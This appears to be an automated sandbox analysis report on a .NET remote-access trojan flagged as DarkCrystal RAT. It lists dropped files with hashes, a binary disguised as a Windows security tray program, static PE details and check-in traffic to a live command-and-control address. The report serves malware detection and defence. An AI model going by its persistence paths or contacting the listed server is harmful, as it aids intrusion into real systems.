                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 25%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                    C:\Users\user\Desktop\zaakdHBM.log

                                                                                                    Download File
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24576
                                                                                                    Entropy (8bit):5.535426842040921
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                                                                    MD5:5420053AF2D273C456FB46C2CDD68F64
                                                                                                    SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                                                                    SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                                                                    SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                    C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:JSON data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):55
                                                                                                    Entropy (8bit):4.306461250274409
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                    Malicious:false
                                                                                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                    C:\Windows\System32\CSC63445EDF6B1F4E2FAF4EDB3743FA6EFB.TMP

                                                                                                    Download File
                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                    File Type:MSVC .res
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1224
                                                                                                    Entropy (8bit):4.435108676655666
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                                                    MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                                                    SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                                                    SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                                                    SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                                                    Malicious:false
                                                                                                    Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

                                                                                                    C:\Windows\System32\SecurityHealthSystray.exe

                                                                                                    Download File
                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4608
                                                                                                    Entropy (8bit):3.9802378117346158
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:6Lp/PtP+M7Jt8Bs3FJsdcV4MKe271dEUvqBHSOulajfqXSfbNtm:GP1Pc+Vx9McUvk8cjRzNt
                                                                                                    MD5:F8E9668B6967B0CFCD84B5D5BE937FE7
                                                                                                    SHA1:1DA2959E84C1EAAC7858329ABCF352B08C71318C
                                                                                                    SHA-256:3980F6B84D146EED21B82DF24FCD7923725DFBB0BBD562975FE0EEFC2505BB54
                                                                                                    SHA-512:6C427420341A26C699B8DD4582E0275DFFE289A9261785770D4D6E5808DD56A729E74966FD0ADDE9F67424FD88ADFFDFDB7A7447F3CE767213FB47E0986C0191
                                                                                                    Malicious:true
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Nyg.............................'... ...@....@.. ....................................@..................................'..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..`.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.0.......#GUID...@... ...#Blob...........WU........%3................................................................

                                                                                                    C:\Windows\Vss\Writers\Application\66bd154ce6dd3f

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:ASCII text, with very long lines (617), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):617
                                                                                                    Entropy (8bit):5.8824875436939585
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:SOIlyRoJ4vL7TEDOxhkdYRj1rfE9e3RrGCYy9JNqd2qD:SOWyqu+OxhjjJc5CfS2i
                                                                                                    MD5:05A2835419371B88F8452138679FF753
                                                                                                    SHA1:65A32017771EB327605D48FB03BDDF8B1F92072B
                                                                                                    SHA-256:987701A30C4B03A9622A3843127CF81FE164510F23EFB5B503FBC47F675A2C9B
                                                                                                    SHA-512:9176A0DD8EB7D24D05F73F6EDB4FC8471A77F57D97FDE52082D3A2C8C4DAEBD0C1C4FDB628CB340411F2D26E62E48BDF5A8210D3D823A71D9F1B5ABACF2C4954
                                                                                                    Malicious:false
                                                                                                    Preview:yMyolHttGM1QiOo6dbWtZIsBlfwGh92n64qaYXNP1Bhge7HOc2KfJjMpdwDGVnLHTOUnhOiGNH2YlMgnYinpyXdWsA6mUH4NzaMQndqOUERCrxERPZswAgT6u84gS5vGMojK9QA42ZVtFbo56oW4ZHNTHPfojJ5YTLzDO4S9Zx4lKj0TU9knj1rEaQCtuWVsd7a4lkqBWWflNmIhZMUjiSybdvn81iOCcLHNJ5rtSiRNVG1yIfUiCvKLJ8b07sKyIcIBe4XdfkR9BkFX3z0WNqArB6ELe0wkYcF37zTNH1CbeKJi2D6I2xkccaAi0M8pyqlifMZEfmPWnjN0wfTb3nsl2mahyvX53XnxjlCpo2mPiOy2NJvU2hwK8Ap2w2PuPTcQ6aRLdnwABcCnyiUpACCVlcyj5J3vm29Ovi6w2k1OuvJf7CENikuMRHodmsPTuAYJcy1PlhxZLxl0TSl3FpNCIx7o3cKKUhetWACJKymAxUAefyKTGWOFxVBp1MWIXnFoT1dSPcsQDNPxwdIES1D8TZ6B9XS7cdnJPWKoV1Dnn8BjGN2YER0fjGV35cT2KuxjjFiaSetaxaVUXW4ve43LnHkJBRt3iLd3LcAAo

                                                                                                    C:\Windows\Vss\Writers\Application\TItoGxsDkTEZBWdlQNGwopi.exe

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3038208
                                                                                                    Entropy (8bit):7.223328720275886
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:49152:X1PeNLJnZWUGUJbjrTWTYOX9mQgTilflXBMuUd/tqYZWurPrEPPQXzCLkUoIjn3:XtelWUG3YOX9mQgGlBBMfd/HprPrEn3n
                                                                                                    MD5:F9589E19D9A2FFBFACB439B029AB4F06
                                                                                                    SHA1:0EB7246EE67D0A7289A1EB5D76A4DF8F1C6A4A72
                                                                                                    SHA-256:6D86B21FEC8D0F8698E2E22AEDA3FBD0381300E8A746BF082418D809B9763156
                                                                                                    SHA-512:B2EBC7249F727A529A693480689F3080189915C702B4E0F369207989D38482B6B2013DAA1A3010D488CA8E64DD56DC4156B67EDA80195D8A0C438B794577D87A
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 76%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................T..........~s... ........@.. ....................................@.................................0s..K.......p............................................................................ ............... ..H............text....S... ...T.................. ..`.rsrc...p............V..............@....reloc...............Z..............@..B................`s......H...........,.......k........#..r.......................................0..........(.... ........8........E........*.......N...8....*(.... ....~....{....9....& ....8....(.... ....~....{l...:....& ....8....(.... ....~....{o...9....& ....8y......0.......... ........8........E....;...................G...86...~....(S... .... .... ....s....~....(W....... ....8....r...ps....z*....~....([...~....(_... ....<.... ....~....{....9f...& ....8[...8.... ....~....{....:B...& ....87...~....

                                                                                                    C:\Windows\Vss\Writers\Application\TItoGxsDkTEZBWdlQNGwopi.exe:Zone.Identifier

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):26
                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                    Malicious:false
                                                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                                                    \Device\Null

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\PING.EXE
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):502
                                                                                                    Entropy (8bit):4.622527548334437
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:PlR5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:BdUOAokItULVDv
                                                                                                    MD5:DF052D7F9603AAE5B5376EB7CFCC8952
                                                                                                    SHA1:F4FAA7034A24B0864B8D2FB1AB0BDE4726F6CA74
                                                                                                    SHA-256:B1E29F7BD855951ABCBD1FBACF4B303E327966D42C9F24A11A85EDADE0E461EE
                                                                                                    SHA-512:20A216261BCCBD2E7FADC4D7A084266877DFCE9C66C4F4E02F882276D31C3081AB880AAE5A01E63B5B40EEDD363C37B30D911952521CC88A398239CDED8C424B
                                                                                                    Malicious:false
                                                                                                    Preview:..Pinging 549163 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

                                                                                                    Static File Info

                                                                                                    General

                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Entropy (8bit):7.223328720275886
                                                                                                    TrID:
                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                    File name:6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File size:3'038'208 bytes
                                                                                                    MD5:f9589e19d9a2ffbfacb439b029ab4f06
                                                                                                    SHA1:0eb7246ee67d0a7289a1eb5d76a4df8f1c6a4a72
                                                                                                    SHA256:6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746bf082418d809b9763156
                                                                                                    SHA512:b2ebc7249f727a529a693480689f3080189915c702b4e0f369207989d38482b6b2013daa1a3010d488ca8e64dd56dc4156b67eda80195d8a0c438b794577d87a
                                                                                                    SSDEEP:49152:X1PeNLJnZWUGUJbjrTWTYOX9mQgTilflXBMuUd/tqYZWurPrEPPQXzCLkUoIjn3:XtelWUG3YOX9mQgGlBBMfd/HprPrEn3n
                                                                                                    TLSH:E3E5BF0EDAD34130CC652BB910CA0E6CE7B8D3776571EF427A5FA8A558CA2318E550FB
                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................T..........~s... ........@.. ....................................@................................

                                                                                                    File Icon

                                                                                                    Icon Hash:90cececece8e8eb0

                                                                                                    Static PE Info

                                                                                                    General

                                                                                                    Entrypoint:0x6e737e
                                                                                                    Entrypoint Section:.text
                                                                                                    Digitally signed:false
                                                                                                    Imagebase:0x400000
                                                                                                    Subsystem:windows gui
                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                    Time Stamp:0x6507AC75 [Mon Sep 18 01:48:37 2023 UTC]
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:
                                                                                                    OS Version Major:4
                                                                                                    OS Version Minor:0
                                                                                                    File Version Major:4
                                                                                                    File Version Minor:0
                                                                                                    Subsystem Version Major:4
                                                                                                    Subsystem Version Minor:0
                                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                    Entrypoint Preview

                                                                                                    Instruction
                                                                                                    jmp dword ptr [00402000h]
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al

                                                                                                    Data Directories

                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x2e73300x4b.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x2e80000x370.rsrc
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x2ea0000xc.reloc
                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                    Sections

                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                    .text0x20000x2e53840x2e54009288185be747f2ef211df9c85dc5b7ceunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                    .rsrc0x2e80000x3700x400eaba832ff201ffa4d3d6b4f3e7d1baf0False0.3759765625data2.859486648576093IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    .reloc0x2ea0000xc0x200ae1accb1d1e35f1ed27975b31704c3b3False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                    Resources

                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                    RT_VERSION0x2e80580x318data0.44823232323232326

                                                                                                    Imports

                                                                                                    DLLImport
                                                                                                    mscoree.dll_CorExeMain

                                                                                                    Network Behavior

                                                                                                    Suricata IDS Alerts

                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                    2025-01-04T14:52:18.763665+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449731154.29.71.980TCP

                                                                                                    Network Port Distribution

                                                                                                    TCP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Jan 4, 2025 14:52:17.992970943 CET4973180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:17.997906923 CET8049731154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:17.998039007 CET4973180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:17.998841047 CET4973180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:18.005739927 CET8049731154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:18.373143911 CET4973180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:18.377979994 CET8049731154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:18.554953098 CET8049731154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:18.763582945 CET8049731154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:18.763664961 CET4973180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:18.804034948 CET8049731154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:18.804054022 CET8049731154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:18.804114103 CET4973180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:18.915432930 CET4973180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:18.920288086 CET8049731154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:19.000345945 CET4973380192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:19.005486965 CET8049733154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:19.005580902 CET4973380192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:19.005683899 CET4973380192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:19.010412931 CET8049733154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:19.072777987 CET8049731154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:19.072988987 CET4973180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:19.077781916 CET8049731154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:19.210980892 CET8049731154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:19.211708069 CET4973180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:19.216487885 CET8049731154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:19.342773914 CET8049731154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:19.342953920 CET4973180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:19.347812891 CET8049731154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:19.347822905 CET8049731154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:19.347831011 CET8049731154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:19.363811016 CET4973380192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:19.368678093 CET8049733154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:19.479918957 CET8049731154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:19.487931013 CET4973180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:19.492747068 CET8049731154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:19.526730061 CET8049733154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:19.618912935 CET8049731154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:19.619127035 CET4973180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:19.623954058 CET8049731154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:19.624025106 CET8049731154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:19.658113003 CET8049733154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:19.658169985 CET4973380192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:19.737657070 CET4973380192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:19.742535114 CET8049733154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:19.837275982 CET8049731154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:19.868134975 CET8049733154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:19.869843006 CET4973380192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:19.874733925 CET8049733154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:19.874743938 CET8049733154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:19.874752998 CET8049733154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:19.879219055 CET4973180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:20.006005049 CET8049733154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:20.066961050 CET4973380192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:20.216099977 CET4973680192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:20.220923901 CET8049736154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:20.221024036 CET4973680192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:20.221797943 CET4973680192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:20.226639032 CET8049736154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:20.235541105 CET4973180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:20.235544920 CET4973380192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:20.240561962 CET8049731154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:20.240652084 CET4973180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:20.240885019 CET8049733154.29.71.9192.168.2.4
